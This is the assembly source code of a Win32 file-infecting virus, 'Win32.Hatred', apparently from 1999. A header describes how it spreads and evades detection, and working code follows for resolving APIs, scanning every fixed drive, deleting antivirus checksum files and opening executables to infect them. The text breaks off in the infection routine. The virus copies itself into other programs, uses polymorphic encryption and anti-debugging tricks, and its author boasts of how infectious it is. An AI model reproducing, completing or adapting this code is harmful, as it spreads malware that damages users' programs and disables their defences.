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3154 lines
161 KiB
NASM
3154 lines
161 KiB
NASM
comment $
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????????????????????????????????????????????????????????????????????????????
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Win32.Hatred
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V.1.0
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????????????????????????????????????????????????????????????????????????????
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by Lord Julus
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????????????????????????????????????????????????????????????????????????????
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April 1999
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????????????????????????????????????????????????????????????????????????????
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Hello everybody and welcome to the source code of my new virus.
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==============================================================
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Briefing
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===============================================================
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Virus Name - Win32.Hatred
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Virus Author - Lord Julus
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Version - V.1.0
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Release Date - 25 April 1999
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Platform - Win32, Win95/98, WinNT
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Type - Parasitic PE infector, directory scanning
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Infects - Win32 Portable Exe files (.EXE, .SCR)
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Encrypted - Yes
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Polymorphic - Yes (Uses an enhanced version of MOF32)
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Retrovirus - Yes
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Anti-debugging - Yes
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Payload - Graphical (Message box and screen fade out
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with pixel blackout; can be stopped by ESC)
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===============================================================
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This virus works kinda like this way:
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When the virus starts, first it locates the following win32 module
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bases:
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Kernel32.dll
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Advapi32.dll
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User32.dll
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Gdi32.dll
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and their corresponding API function addresses. If this goal is
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achieved without any errors, the virus checks the system out and makes out
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an array containing all drive names that are fixed disks, like this:
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"c:\", "d:\", ..., 0FFh
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This list will be used in infection later.
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After that, the virus checks the registry for this key:
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"HKEY_CURRENT_USER\Control Panel\Cursors"
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If it can be opened then the following name is queried:
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"dertaH"
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If the value can be retrieved, it is decrypted with a simple XOR
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algorithm and then it is checked to see if it is really a valid path on
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the hard disk.
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If the value cannot be retrieved, or the value retrieved is not a
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valid path on the HDD, then the virus initializes the key name with a
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value equal to the first entry in the drives list ("C:\", for ex.).
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After this is done, the scanning procedure is started. The scanning
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procedure starts scanning from the root of the matching drive (the drive
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that was retrieved from the registry) and goes all the way until it finds
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out the directory specified in the registry (if the virus runs for the
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first time, the first directory will be the root itself). From that
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directory on, the virus scans the harddisk for PE files, trying to locate
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5 PE files. If the 5 PE files are not found on one HDD or on one
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partition, the scanning goes on with the next partition or hdd, as they
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are found in the drives list. If the search reaches the end of drives
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list, but still 5 PE files were not found, this means that all harddisk
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drives and all partition tables were checked once and all PE files on the
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entire system are infected. So, the virus resets it's first path to the
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first root, and the scanning process starts from the beginning. To
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prevent a big system slowdown only 90 directories are checked at a time.
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In this way, as I tested the scanning procedures many times, basically no
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slowdown is notticed. Still, all drives and partitions are scanned and
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infected.
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Once 5 files were found, or more than 90 directories were checked,
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the virus goes back into the registry and marks there the last directory
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that was checked. This will be used the next time the virus starts as the
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starting point for the scanning.
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In the beginning, if the key inside the registry is not found, a
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direct attack procedure is started which searches and infects the
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following files:
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CDPLAYER.EXE
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CALC.EXE
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PBRUSH.EXE
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MPLAYER.EXE
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NOTEPAD.EXE
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WINHLP32.EXE
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The appending method is the last section increase. The virus
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attaches itself to last section's RVA plus it's virtual size and sets the
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file entrypoint to itself. After finishing all the work, the virus returns
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the control to the host restoring all registers, stack and SEH handlers.
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Each time one directory is checked for PE files, all antivirus
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checksum files found in that directory get erased. The virus avoids to
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infect files with certain names (AV file names)
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The PE files are marked as infected like this:
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Win32VersionValue is set to 'H8'
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This virus includes a slighty modified version of the MOF32 poly
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engine and from my calculation only 4 bytes stay unencrypted in the victim
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file, which is pretty cool...
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For the Anti-debugging I have used some apis that notifies the
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presence of a debugger and the file is automatically closed. I tried this
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using the debugger in Visual C++ and it works. Should crash many code
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emulators which rely on the use of win32 debugging methods.
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This is far the best virus I wrote so far, probably due to the poly
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engine and the way it is spreading, and it has the highest possibility of
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spreading, being very infectious. I guess probably this will be my last
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win32 directory scanning virus and my next code will be a resident win32
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virus.
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Farewell,
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???????????????????????????
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? Lord Julus - 1999 ?
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???????????????????????????
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====== ======= ======
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======= With Heart feel Hatred!!! ======
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====== Black blood runs through my veins!! ======
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====== Hatred!!! Hatred!!! =====
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======== =======
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===========
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(ManOwaR)
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Assemble with: TASM32 -ml -m hatred.asm
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TLINK32 -Tpe -aa -c hatred,,,import32.lib
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PEWRSEC hatred.exe
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$
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; [ EQUATES ]
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;
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; The following equates are crucial for the way this code gets compiled.
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; You must be warned that changing any of these values might make this
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; code act diferently. You modify them at your own will.
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;
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; To simply test the directory search capability set the value TESTONLY
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; to TRUE and look in the registry (no files are searched)
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;
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; To only have infection on files like GOAT* set the value DEBUG to TRUE
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;
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; To test the payload of this virus set DEBUG and TESTONLY to TRUE and set
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; the date to day 07.
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TRUE EQU 1 ;
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FALSE EQU 0 ;
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DEBUG EQU TRUE ; If TRUE only GOAT* files are searched
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TESTONLY EQU FALSE ; If True only dir. scan and reg. update
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RETRO EQU TRUE ; kill av files?
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.386p ; needed stuff
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.model flat, stdcall ;
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jumps ;
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;
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extrn MessageBoxA: proc ;
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extrn ExitProcess: proc ; externals
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extrn GetModuleHandleA:proc ;
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extrn GetProcAddress:proc ;
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;
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.data ;
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db 0 ;
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;
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.code ;
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;
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start: ;
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pushad ; save all
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;
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jump_code: ;
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jmp decrypt ; call poly decryptor
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;
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realstart: ;
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start_of_code: ;
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nop ;
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nop ;
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popad ;
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pushad ;
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call getdelta ; get delta handle
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;
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getdelta: ;
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pop ebp ;
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sub ebp, offset getdelta ;
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mov [ebp+delta], ebp ; save delta for later
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;-----------------------------------------------;
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lea eax, [ebp+ExceptionExit] ; Setup a SEH frame
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push eax ;
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push dword ptr fs:[0] ;
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mov fs:[0], esp ;
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;-----------------------------------------------;
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mov eax, [esp+28h] ; first let's locate the
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lea edx, [ebp+kernel32_name] ; kernel32 base address
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call LocateKernel32 ;
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jc ReturnToHost ;
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mov dword ptr [ebp+k32], eax ; save it...
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;-----------------------------------------------;
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lea edx, dword ptr [ebp+getprocaddress] ; then let's locate
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call LocateGetProcAddress ; GetProcAddress
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jc ReturnToHost ;
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;-----------------------------------------------;
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mov ebx, eax ; now let's locate all
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mov eax, dword ptr [ebp+k32] ; the K32 apis we need
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lea edi, dword ptr [ebp+k32_API_names] ; furthure...
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lea esi, dword ptr [ebp+k32_API_addrs] ;
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call LocateApiAddresses ;
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jc ReturnToHost ;
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;-----------------------------------------------;
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lea edi, dword ptr [ebp+user32_name] ; Locate USER32
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call LocateModuleBase ; module base
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jc ReturnToHost ;
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;-----------------------------------------------;
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lea edi, dword ptr [ebp+u32_API_names] ; and the corresp.
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lea esi, dword ptr [ebp+u32_API_addrs] ; API addresses
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call LocateApiAddresses ;
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jc ReturnToHost ;
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;-----------------------------------------------;
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IF DEBUG ; Anti-debugging !!
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ELSE ;
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call [ebp+_IsDebuggerPresent] ; Let's check if our
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or eax, eax ; process is being
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jne shut_down ; debugged.
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jmp continue_process ;
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;
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shut_down: ;
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push 0 ; If so, close down!!
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push 02h or 04h or 08h or 10h ; this doesn't really
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call [ebp+_ExitWindowsEx] ; close Windoze...
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ENDIF ;
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;----------------------------------------------;
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continue_process: ;
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lea edi, dword ptr [ebp+advapi32_name] ; Locate the ADVAPI32
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call LocateModuleBase ; module base
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jc ReturnToHost ;
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;-----------------------------------------------;
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lea edi, dword ptr [ebp+a32_API_names] ; and the corresp.
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lea esi, dword ptr [ebp+a32_API_addrs] ; API addresses
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call LocateApiAddresses ;
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jc ReturnToHost ;
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;-----------------------------------------------;
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lea edi, dword ptr [ebp+gdi32_name] ; Locate GDI32
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call LocateModuleBase ; module base
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jc ReturnToHost ;
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;-----------------------------------------------;
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lea edi, dword ptr [ebp+g32_API_names] ; and the corresp.
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lea esi, dword ptr [ebp+g32_API_addrs] ; API addresses
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call LocateApiAddresses ;
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jc ReturnToHost ;
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;-----------------------------------------------;
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call CheckSystem ; retrive HDD names
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;-----------------------------------------------;
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lea eax, [ebp+curdir] ; save the current dir
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push eax ;
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push 260 ;
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call [ebp+_GetCurrentDirectoryA] ;
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;-----------------------------------------------;
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call SetInitialKey ; Edi will point to the
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;-----------------------------------------------; last directory checked.
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lea eax, dword ptr [ebp+system_paths] ; If the key didn't exist
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scan_current_path: ; it gets created. Then
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mov bl, byte ptr [eax] ; we make eax to point to
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cmp bl, byte ptr [edi] ; the right drive letter
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je ok_go ; in the system paths
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add eax, 4 ;
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cmp byte ptr [eax], 0FFh ;
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je ReturnToHost ;
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jmp scan_current_path ;
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ok_go: ;
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;-----------------------------------------------;
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call LocateNextDirectory ; and then we search...
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;-----------------------------------------------;
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call SetSubsequentKey ; set the new key
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;-----------------------------------------------;
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lea eax, [ebp+curdir] ; restore the current dir
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push eax ;
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call [ebp+_SetCurrentDirectoryA] ;
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;-----------------------------------------------;
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call Payload ;
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;-----------------------------------------------;
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jmp ReturnToHost ; return to host
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;-----------------------------------------------;
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;??????????????????????????????????????????????????????????????????????????
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;? Locate Kernel32 base address ?
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;??????????????????????????????????????????????????????????????????????????
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;
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; Entry: EAX = dword on stack at startup
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; EDX = pointer to kernel32 name
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;
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; Return: EAX = base address of kernel32 if success
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; EAX = 0, CF set if fail
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LocateKernel32 proc near
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pushad ; save all registers
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lea ebx, dword ptr [ebp+try_method_2_error] ; first set up a seh
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push ebx ; frame so that if our
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push dword ptr fs:[0] ; first method crashes
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mov fs:[0], esp ; we will find ourselves
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; in the second method
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locateloop: ;
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cmp dword ptr [eax+0b4h], eax ; first method looks for
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je found_k32_kill_seh ; the k32 by checking for
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dec eax ; the equal dword at 0b4
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cmp eax, 40000000h ;
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jbe try_method_2 ;
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jmp locateloop ;
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;
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found_k32_kill_seh: ; if we found it, then we
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pop dword ptr fs:[0] ; must destroy the temp
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add esp, 4 ; seh frame
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mov dr0, eax ; save k32 base in DR0
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jmp found_k32 ;
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;
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try_method_2_error: ; if the first method gave
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mov esp, [esp+8] ; and exception error we
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; must restore the stack
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try_method_2: ;
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pop dword ptr fs:[0] ; restore the seh state
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add esp, 4 ;
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popad ; restore registers and
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pushad ; save them again
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; and go on w/ method two
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mov ebx, dword ptr [ebp+imagebase] ; now put imagebase in ebx
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mov esi, ebx ;
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cmp word ptr [esi], 'ZM' ; check if it is an EXE
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jne notfound_k32 ;
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mov esi, dword ptr [esi.MZ_lfanew] ; get pointer to PE
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cmp esi, 1000h ; too far away?
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jae notfound_k32 ;
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add esi, ebx ;
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cmp word ptr [esi], 'EP' ; is it a PE?
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jne notfound_k32 ;
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add esi, IMAGE_FILE_HEADER_SIZE ; skip header
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mov edi, dword ptr [esi.OH_DataDirectory.DE_Import.DD_VirtualAddress]
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add edi, ebx ; and get import RVA
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mov ecx, dword ptr [esi.OH_DataDirectory.DE_Import.DD_Size]
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add ecx, edi ; and import size
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mov eax, edi ; save RVA
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;
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locateloop2: ;
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mov edi, dword ptr [edi.ID_Name] ; get the name
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add edi, ebx ;
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cmp dword ptr [edi], 'NREK' ; and compare to KERN
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je found_the_kernel_import ; if it is not that one
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add eax, IMAGE_IMPORT_DESCRIPTOR_SIZE ; skip to the next desc.
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mov edi, eax ;
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cmp edi, ecx ; but not beyond the size
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jae notfound_k32 ; of the descriptor
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jmp locateloop2 ;
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;
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found_the_kernel_import: ; if we found the kernel
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mov edi, eax ; import descriptor
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mov esi, dword ptr [edi.ID_FirstThunk] ; take the pointer to
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add esi, ebx ; addresses
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mov edi, dword ptr [edi.ID_Characteristics] ; and the pointer to
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add edi, ebx ; names
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;
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gha_locate_loop: ;
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push edi ; save pointer to names
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mov edi, dword ptr [edi.TD_AddressOfData] ; go to the actual thunk
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add edi, ebx ;
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add edi, 2 ; and skip the hint
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;
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push edi esi ; save these
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lea esi, dword ptr [ebp+getmodulehandle] ; and point the name of
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mov ecx, getmodulehandlelen ; GetModuleHandleA
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rep cmpsb ; see if it is that one
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je found_getmodulehandle ; if so...
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pop esi edi ; otherwise restore
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;
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pop edi ; restore arrays indexes
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add edi, 4 ; and skip to next
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add esi, 4 ;
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cmp dword ptr [esi], 0 ; 0? -> end of import
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je notfound_k32 ;
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jmp gha_locate_loop ;
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;
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found_getmodulehandle: ;
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pop esi ; restore stack
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pop edi ;
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pop edi ;
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;
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push edx ; push kernel32 name
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mov esi, [esi] ; esi = GetModuleHandleA
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call esi ; address...
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mov dr0, eax ; DR0 holds k32 base!!
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||
or eax, eax ;
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jz notfound_k32 ;
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;
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found_k32: ;
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popad ; restore all regs and
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mov eax, dr0 ; put k32 in EAX
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clc ; and mark success
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ret ;
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||
;
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notfound_k32: ;
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popad ; restore all regs
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xor eax, eax ; and mark the failure...
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stc ;
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ret ;
|
||
LocateKernel32 endp ;
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Locate GetProcAddress ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;
|
||
; Entry: EAX = base of kernel32
|
||
; EDX = pointer to GetProcAddress name
|
||
;
|
||
; Return: EAX = address of GetProcAddress if success
|
||
; EAX = 0, CF set if fail
|
||
|
||
LocateGetProcAddress proc near ;
|
||
pushad ;
|
||
mov ebx, eax ; save the kernel base
|
||
mov edi, eax ;
|
||
cmp word ptr [edi], 'ZM' ; is it an exe?
|
||
jne notfoundgpa ;
|
||
;
|
||
mov edi, dword ptr [edi.MZ_lfanew] ;
|
||
cmp edi, 1000h ;
|
||
jae notfoundgpa ;
|
||
;
|
||
add edi, ebx ;
|
||
cmp word ptr [edi], 'EP' ; is it a PE?
|
||
jne notfoundgpa ;
|
||
;
|
||
add edi, IMAGE_FILE_HEADER_SIZE ; skip file header
|
||
;
|
||
mov edi, dword ptr [edi.OH_DataDirectory.DE_Export.DD_VirtualAddress]
|
||
add edi, ebx ; and get export RVA
|
||
;
|
||
mov ecx, dword ptr [edi.ED_NumberOfNames] ; save number of names
|
||
; to look into
|
||
mov esi, dword ptr [edi.ED_AddressOfNames] ; get address of names
|
||
add esi, ebx ; align to base rva
|
||
;
|
||
push edi ; save pointer to export
|
||
;
|
||
gpa_locate_loop: ;
|
||
mov edi, [esi] ; get one name address
|
||
add edi, ebx ; and align it
|
||
;
|
||
push ecx esi ; save counter and addr.
|
||
;
|
||
mov esi, edx ; compare to GetProcAddress
|
||
mov ecx, getprocaddresslen ;
|
||
rep cmpsb ;
|
||
je foundgpa ;
|
||
;
|
||
pop esi ecx ; restore them
|
||
;
|
||
add esi, 4 ; and get next name
|
||
loop gpa_locate_loop ;
|
||
;
|
||
notfoundgpa: ; we didn't find it...
|
||
pop edi ;
|
||
popad ;
|
||
xor eax, eax ; mark failure
|
||
stc ;
|
||
ret ;
|
||
;
|
||
foundgpa: ;
|
||
pop esi ecx ; ecx = how many did we
|
||
pop edi ; check from total, but
|
||
sub ecx, dword ptr [edi.ED_NumberOfNames] ; we need the reminder
|
||
neg ecx ; of the search
|
||
mov eax, dword ptr [edi.ED_AddressOfOrdinals]; get address of ordinals
|
||
add eax, ebx ;
|
||
shl ecx, 1 ; and look using the index
|
||
add eax, ecx ;
|
||
xor ecx, ecx ;
|
||
mov cx, word ptr [eax] ; take the ordinal
|
||
mov eax, dword ptr [edi.ED_AddressOfFunctions]; take address of funcs.
|
||
add eax, ebx ;
|
||
shl ecx, 2 ; we look in a dword array
|
||
add eax, ecx ; go to the function addr
|
||
mov eax, [eax] ; take it's address
|
||
add eax, ebx ; and align it to k32 base
|
||
mov dr0, eax ; save it in dr0
|
||
popad ; restore all regs
|
||
mov eax, dr0 ; and mark success
|
||
clc ;
|
||
ret ;
|
||
LocateGetProcAddress endp ;
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? General module handle retriving routine ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;
|
||
; Entry: EDI = pointer to module name
|
||
;
|
||
; Return: EAX = module base address if success
|
||
; EAX = 0, CF set if fail
|
||
|
||
LocateModuleBase proc near ;
|
||
pushad ; save regs
|
||
push edi ; push name
|
||
call dword ptr [ebp+_GetModuleHandleA] ; call GetModuleHandleA
|
||
mov dr0, eax ;
|
||
popad ;
|
||
mov eax, dr0 ;
|
||
or eax, eax ;
|
||
jz notfoundmodule ;
|
||
clc ; success
|
||
ret ;
|
||
;
|
||
notfoundmodule: ;
|
||
stc ; fail
|
||
ret ;
|
||
LocateModuleBase endp ;
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? General API address retriving routine ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;
|
||
; Entry: EAX = base address of the module
|
||
; EBX = address of GetProcAddress
|
||
; EDI = pointer to api names list (each item null terminated,
|
||
; list terminated with 0FFh)
|
||
; ESI = pointer to api addresses list
|
||
;
|
||
; Return: CF clear if success and list at ESI filled with API addresses
|
||
; CF set if fail
|
||
|
||
LocateApiAddresses proc near ;
|
||
pushad ; save all regs
|
||
mov edx, eax ; save module base
|
||
locate_apis_loop: ;
|
||
cmp byte ptr [edi], 0FFh ; is it the end?
|
||
je ready_apis ;
|
||
;
|
||
push edx ; save base
|
||
push edi ; push api name
|
||
push edx ; push module base
|
||
call ebx ; call GetProcAddress
|
||
pop edx ; restore module base
|
||
or eax, eax ; error?
|
||
je error_finding_apis ;
|
||
;
|
||
mov dword ptr [esi], eax ; save api address
|
||
;
|
||
mov ecx, 100h ; look for the next
|
||
mov al, 0 ; api name
|
||
repnz scasb ;
|
||
;
|
||
add esi, 4 ; increment array
|
||
jmp locate_apis_loop ;
|
||
;
|
||
ready_apis: ;
|
||
popad ; all ok!
|
||
clc ;
|
||
ret ;
|
||
;
|
||
error_finding_apis: ;
|
||
popad ; error here...
|
||
stc ;
|
||
ret ;
|
||
LocateApiAddresses endp ;
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Return to host or exit from generation 0 ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
|
||
ReturnToHost proc near ;
|
||
jmp restore_seh ;
|
||
;
|
||
ExceptionExit: ; if we had an error we
|
||
mov esp, [esp+8] ; must restore the ESP
|
||
;
|
||
restore_seh: ;
|
||
pop dword ptr fs:[0] ; and restore the SEH
|
||
add esp, 4 ; returning to the host...
|
||
;
|
||
or ebp, ebp ; is it generation 0?
|
||
je generation0_exit ;
|
||
;
|
||
popad ;
|
||
;
|
||
push edi ; temporary save edi
|
||
db 0bfh ; put delta in edi
|
||
delta dd 0 ;
|
||
;
|
||
cmp edi, 0 ; first generation ?
|
||
je generation0_exit ;
|
||
mov eax, [edi+offset oldeip] ; restore old EIP
|
||
add eax, [edi+offset imagebase] ; align to memory
|
||
push eax ;
|
||
push ebx ;
|
||
lea ebx, [edi+offset jump] ; calculate the length of
|
||
sub eax, ebx ; the jump to the host
|
||
sub eax, 4 ;
|
||
mov dword ptr [edi+jump], eax ; and store the jump!
|
||
pop ebx ; restore the last regs...
|
||
pop eax ;
|
||
pop edi ;
|
||
;
|
||
db 0e9h ; this is JMP Original EIP
|
||
jump dd 0 ;
|
||
;
|
||
generation0_exit: ; exit from generation 0
|
||
push 0 ;
|
||
call ExitProcess ;
|
||
ReturnToHost endp ;
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Check the system routines ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
|
||
CheckSystem proc near ;
|
||
pushad ; save regs
|
||
lea esi, [ebp+temp_path] ; start from "c:\"
|
||
lea edi, [ebp+system_paths] ;
|
||
;
|
||
retrive_drive_type: ;
|
||
push esi ;
|
||
call [ebp+_GetDriveTypeA] ; get drive type
|
||
;
|
||
cmp eax, 3 ; is it a fixed disk?
|
||
jne check_next_path ;
|
||
;
|
||
mov ecx, 4 ; save the name in the list
|
||
push esi ;
|
||
repnz movsb ;
|
||
pop esi ;
|
||
;
|
||
check_next_path: ;
|
||
inc byte ptr [esi] ; and go on until z:\
|
||
cmp byte ptr [esi], 'z' ;
|
||
je finished_paths_search ;
|
||
jmp retrive_drive_type ;
|
||
;
|
||
finished_paths_search: ;
|
||
mov al, 0FFh ; mark the end
|
||
stosb ;
|
||
popad ;
|
||
ret ;
|
||
CheckSystem endp ;
|
||
;
|
||
system_paths db 20 dup (0,0,0,0) ; drives table
|
||
temp_path db "c:\", 0 ; first path
|
||
allfiles db "*.*", 0 ; all files mask
|
||
dotdot db "..", 0 ; dot dot
|
||
|
||
comment %
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Allocate memory area ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;
|
||
; Entry: ECX = size of memory to allocate
|
||
;
|
||
; Return: EAX = new memory area address if succes
|
||
; EAX = 0, CF set if error
|
||
|
||
AllocateMemory proc near ;
|
||
push ecx ; push ammount of memo
|
||
push 040h ; fixed mem initialized
|
||
call [ebp+_GlobalAlloc] ; with 0
|
||
or eax, eax ;
|
||
je no_memory ;
|
||
;
|
||
clc ;
|
||
ret ;
|
||
;
|
||
no_memory: ;
|
||
stc ;
|
||
ret ;
|
||
AllocateMemory endp ;
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Free memory area ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;
|
||
; Entry: EAX = memory area handle
|
||
;
|
||
; Return: nothing
|
||
|
||
FreeMemory proc near ;
|
||
push eax ; free the memory
|
||
call [ebp+_GlobalFree] ; handle
|
||
ret ;
|
||
FreeMemory endp ;
|
||
%
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Locate needed directories ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;
|
||
; Entry: EDI = pointer to the directory to start from
|
||
; EAX = pointer in the system paths
|
||
|
||
LocateNextDirectory proc near ;
|
||
pushad ; save regs
|
||
;
|
||
mov [ebp+signal], 0 ;
|
||
mov [ebp+files], 5 ; how many files ?
|
||
mov [ebp+scanneddirs], 90 ; how many directories ?
|
||
;
|
||
push eax ;
|
||
mov edi, eax ; start from...
|
||
;
|
||
parse_all_system: ;
|
||
cmp [ebp+signal], 1 ;
|
||
je no_more_handles ;
|
||
push edi ; set the current dir to the
|
||
call [ebp+_SetCurrentDirectoryA] ; root of the dir
|
||
xor ebx, ebx ; ebx will hold the entries in
|
||
; the depth
|
||
find_first_directory: ;
|
||
cmp [ebp+signal], 1 ;
|
||
je no_first_dir_found ;
|
||
lea edi, [ebp+searchrec] ; locate the first directory
|
||
push edi ;
|
||
lea eax, [ebp+allfiles] ;
|
||
push eax ;
|
||
call [ebp+_FindFirstFileA] ;
|
||
;
|
||
cmp eax, -1 ;
|
||
je no_first_dir_found ; if we didn't find any...
|
||
;
|
||
mov [ebp+handle], eax ; save the handle
|
||
;
|
||
check_attributes: ;
|
||
cmp dword ptr [edi.FileAttributes], 10h ; is it really a
|
||
jne find_next_directory ; directory?
|
||
;
|
||
lea eax, [edi.FileName] ; get directory name and be sure
|
||
cmp byte ptr [eax], '.' ; it isn't "." or ".."
|
||
je find_next_directory ;
|
||
;
|
||
push eax ; set it as the new current
|
||
call [ebp+_SetCurrentDirectoryA] ; directory
|
||
;
|
||
cmp [ebp+skip], 1 ; do we need to check the path?
|
||
je locate_files ;
|
||
;
|
||
pushad ; if so, then first get the current
|
||
lea eax, [ebp+offset tempdir] ; directory and...
|
||
push eax ;
|
||
push 260 ;
|
||
call [ebp+_GetCurrentDirectoryA] ;
|
||
lea edi, [ebp+offset tempdir] ;
|
||
lea esi, [ebp+key_data] ; ...compare it with the one saved
|
||
mov eax, esi ; in the registry...
|
||
push eax ;
|
||
call [ebp+_lstrlen] ;
|
||
mov ecx, eax ;
|
||
rep cmpsb ; if they are equal, we start over
|
||
jne not_found_our_dir ; from there...
|
||
popad ;
|
||
jmp locate_files ;
|
||
;
|
||
not_found_our_dir: ;
|
||
popad ;
|
||
jmp still_go ;
|
||
;
|
||
locate_files: ;
|
||
mov [ebp+skip], 1 ;
|
||
;
|
||
IF TESTONLY ;
|
||
ELSE ;
|
||
call LocateFilesInDirectory ; ...
|
||
ENDIF ;
|
||
;
|
||
dec [ebp+scanneddirs] ; do not scan more than 90 dirs.
|
||
jnz still_ok ; If HDD is completely infected the
|
||
; process would slow too much...
|
||
mov [ebp+signal], 1 ;
|
||
;
|
||
still_ok: ;
|
||
cmp [ebp+files], 0 ;
|
||
jne still_go ;
|
||
;
|
||
mov [ebp+signal], 1 ;
|
||
;
|
||
still_go: ;
|
||
push dword ptr [ebp+handle] ; push the handle
|
||
inc ebx ; increment pushed handles number
|
||
jmp find_first_directory ; and search again
|
||
;
|
||
find_next_directory: ;
|
||
cmp [ebp+signal], 1 ;
|
||
je no_next_dir_found ;
|
||
push edi ; let's find the next directory
|
||
push dword ptr [ebp+handle] ;
|
||
call [ebp+_FindNextFileA] ;
|
||
;
|
||
test eax, eax ;
|
||
jz no_next_dir_found ; if no next dir...
|
||
;
|
||
jmp check_attributes ; otherwise check...
|
||
;
|
||
no_first_dir_found: ; if no new dir was found in where
|
||
cmp [ebp+signal], 1 ;
|
||
je don_t_change ;
|
||
lea eax, [ebp+dotdot] ; we are let's go back one dir
|
||
push eax ; changing to '..'
|
||
call [ebp+_SetCurrentDirectoryA] ;
|
||
;
|
||
don_t_change: ;
|
||
or ebx, ebx ; do we have any saved find
|
||
jz no_more_handles ; handles?
|
||
;
|
||
dec ebx ; if we do decrement and pop one
|
||
pop dword ptr [ebp+handle] ; of the stack...
|
||
jmp find_next_directory ; and let's find one more...
|
||
;
|
||
no_next_dir_found: ; if no next dir was found, let's
|
||
cmp [ebp+signal], 1 ;
|
||
je no_first_dir_found ;
|
||
push dword ptr [ebp+handle] ; close the find handle
|
||
call [ebp+_FindClose] ;
|
||
jmp no_first_dir_found ;
|
||
;
|
||
no_more_handles: ; when all handles are closed in
|
||
pop eax ; the current drive let's try
|
||
add eax, 4 ; the next one...
|
||
push eax ;
|
||
mov edi, eax ;
|
||
cmp byte ptr [eax], 0FFh ; 0ffh marks the end...
|
||
jne parse_all_system ;
|
||
;
|
||
cmp [ebp+scanneddirs], 0 ;
|
||
je quit_this ;
|
||
;
|
||
cmp [ebp+files], 0 ; if we didn't find all the files
|
||
je quit_this ; during our search
|
||
lea eax, [ebp+system_paths] ; then we must reset ourselves
|
||
push eax ;
|
||
call [ebp+_SetCurrentDirectoryA] ;
|
||
;
|
||
quit_this: ;
|
||
pop eax ; restore all and go away...
|
||
popad ;
|
||
ret ;
|
||
LocateNextDirectory endp ;
|
||
;
|
||
LocateFilesInDirectory proc near ;
|
||
pushad ;
|
||
;
|
||
lea ebx, [ebp+filemasks] ; point the filemasks
|
||
push ebx ;
|
||
;
|
||
try_next_ext: ;
|
||
cmp [ebp+files], 0 ;
|
||
je no_files ;
|
||
lea eax, [ebp+offset searchfiles] ;
|
||
push eax ;
|
||
push ebx ;
|
||
call [ebp+_FindFirstFileA] ; search first matching file
|
||
;
|
||
cmp eax, -1 ;
|
||
je no_files ;
|
||
;
|
||
mov [ebp+searchhandle], eax ; save it's handle
|
||
;
|
||
test_file: ;
|
||
lea edi, [ebp+searchfiles] ;
|
||
cmp dword ptr [edi.FileAttributes], 10h ; skip directories
|
||
je next_file ;
|
||
;
|
||
lea esi, [edi.FileName] ; point the name
|
||
;
|
||
call ValidateFile ; can we infect it?
|
||
jc next_file ;
|
||
;
|
||
call OpenFile ; open the file!!
|
||
;
|
||
next_file: ;
|
||
cmp [ebp+files], 0 ;
|
||
je no_files ;
|
||
lea eax, [ebp+searchfiles] ;
|
||
push eax ; search the next file
|
||
mov eax, [ebp+searchhandle] ;
|
||
push eax ;
|
||
call [ebp+_FindNextFileA] ;
|
||
;
|
||
test eax, eax ;
|
||
jz no_files ;
|
||
jmp test_file ;
|
||
;
|
||
no_files: ;
|
||
mov eax, [ebp+searchhandle] ;
|
||
push eax ;
|
||
call [ebp+_FindClose] ; close the search handle
|
||
;
|
||
IF RETRO ;
|
||
call EraseChecksums ; kill av files?
|
||
ENDIF ;
|
||
;
|
||
pop ebx ; locate the next extension
|
||
mov edi, ebx ; in the list
|
||
mov ecx, 100 ;
|
||
mov al, 0 ;
|
||
repnz scasb ;
|
||
mov ebx, edi ;
|
||
cmp byte ptr [ebx], 0FFh ;
|
||
je no_more ;
|
||
push ebx ;
|
||
jmp try_next_ext ; and try again...
|
||
;
|
||
no_more: ;
|
||
popad ;
|
||
ret ;
|
||
LocateFilesInDirectory endp ;
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Open the file ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;
|
||
; Entry: ESI = pointer to the file name
|
||
;
|
||
|
||
OpenFile proc near
|
||
pushad ; save registers
|
||
mov [ebp+fileofs], esi ; save file name offset
|
||
push esi ; save it
|
||
call [ebp+_GetFileAttributes] ; Get the file attributes
|
||
or eax, eax ;
|
||
jz error1 ;
|
||
mov [ebp+fileattributes], eax ; save them
|
||
;
|
||
error1: ;
|
||
push 80h ;
|
||
push esi ;
|
||
call [ebp+_SetFileAttributes] ; set them as normal
|
||
;
|
||
push 0 ; and open the file
|
||
push 0 ;
|
||
push 3 ;
|
||
push 0 ;
|
||
push 1 ;
|
||
push 80000000h or 40000000h ;
|
||
push esi ;
|
||
call [ebp+_CreateFileA] ;
|
||
;
|
||
cmp eax, -1 ; error?
|
||
je next_file_exit ;
|
||
;
|
||
mov [ebp+handle1], eax ; save it's handle
|
||
;
|
||
lea ebx, [ebp+offset FileTime] ; now save the file time
|
||
push ebx ;
|
||
add ebx, 8 ;
|
||
push ebx ;
|
||
add ebx, 8 ;
|
||
push ebx ;
|
||
push eax ;
|
||
call [ebp+_GetFileTime] ;
|
||
;
|
||
push 0 ; get file size
|
||
mov eax, [ebp+handle1] ;
|
||
push eax ;
|
||
call [ebp+_GetFileSize] ;
|
||
;
|
||
mov [ebp+filesize], eax ; save the filesize and calculate
|
||
add eax, virussize+500h ; ammount of memory needed
|
||
;
|
||
push 0 ; and create a file mapping
|
||
push eax ;
|
||
push 0 ;
|
||
push 4 ;
|
||
push 0 ;
|
||
mov eax, [ebp+handle1] ;
|
||
push eax ;
|
||
call [ebp+_CreateFileMappingA] ;
|
||
;
|
||
cmp eax, 0 ;
|
||
je close_file ;
|
||
;
|
||
mov [ebp+maphandle], eax ; save map handle
|
||
;
|
||
mov eax, [ebp+filesize] ;
